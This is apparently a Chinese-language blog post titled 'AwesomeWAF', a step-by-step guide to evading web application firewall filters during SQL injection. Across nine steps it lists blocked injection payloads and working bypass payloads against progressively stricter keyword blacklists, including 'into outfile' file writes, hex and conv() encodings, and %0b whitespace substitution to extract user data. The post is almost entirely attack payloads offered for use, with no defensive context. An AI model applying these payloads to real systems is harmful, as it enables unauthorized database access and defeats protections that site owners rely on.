AwesomeWAF 绕WAF ByPass手法指南

2019年9月30日08:00:11 发表评论

AwesomeWAF 绕WAF ByPass手法指南

正则绕过

多少waf 使用正则匹配。

黑名单检测/bypass

Case: SQL 注入

• Step 1:

过滤关键词andorunion
可能正则preg_match('/(and|or|union)/i', $id)

  • 被拦截的语句union select user, password from users
  • bypass语句1 || (select user from users where user_id = 1) = 'admin'
• Step 2:

过滤关键词andorunionwhere

  • 被拦截的语句1 || (select user from users where user_id = 1) = 'admin'
  • bypass语句1 || (select user from users limit 1) = 'admin'
• Step 3:

过滤关键词andorunionwherelimit

  • 被拦截的语句1 || (select user from users limit 1) = 'admin'
  • bypass语句1 || (select user from users group by user_id having user_id = 1) = 'admin'
• Step 4:

过滤关键词andorunionwherelimitgroup by

  • 被拦截的语句1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • bypass语句1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• Step 5:

过滤关键词andorunionwherelimitgroup byselect

  • 被拦截的语句1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • bypass语句1 || 1 = 1 into outfile 'result.txt'
  • bypass语句1 || substr(user,1,1) = 'a'
• Step 6:

过滤关键词andorunionwherelimitgroup byselect'

  • 被拦截的语句1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • bypass语句1 || user_id is not null
  • bypass语句1 || substr(user,1,1) = 0x61
  • bypass语句1 || substr(user,1,1) = unhex(61)
• Step 7:

过滤关键词andorunionwherelimitgroup byselect'hex

  • 被拦截的语句1 || substr(user,1,1) = unhex(61)
  • bypass语句1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:

过滤关键词andorunionwherelimitgroup byselect'hexsubstr

  • 被拦截的语句1 || substr(user,1,1) = lower(conv(11,10,36))
  • bypass语句1 || lpad(user,7,1)
• Step 9:

过滤关键词andorunionwherelimitgroup byselect'hexsubstrwhite space

  • 被拦截的语句1 || lpad(user,7,1)
  • bypass语句1%0b||%0blpad(user,7,1)

发表评论

后发表评论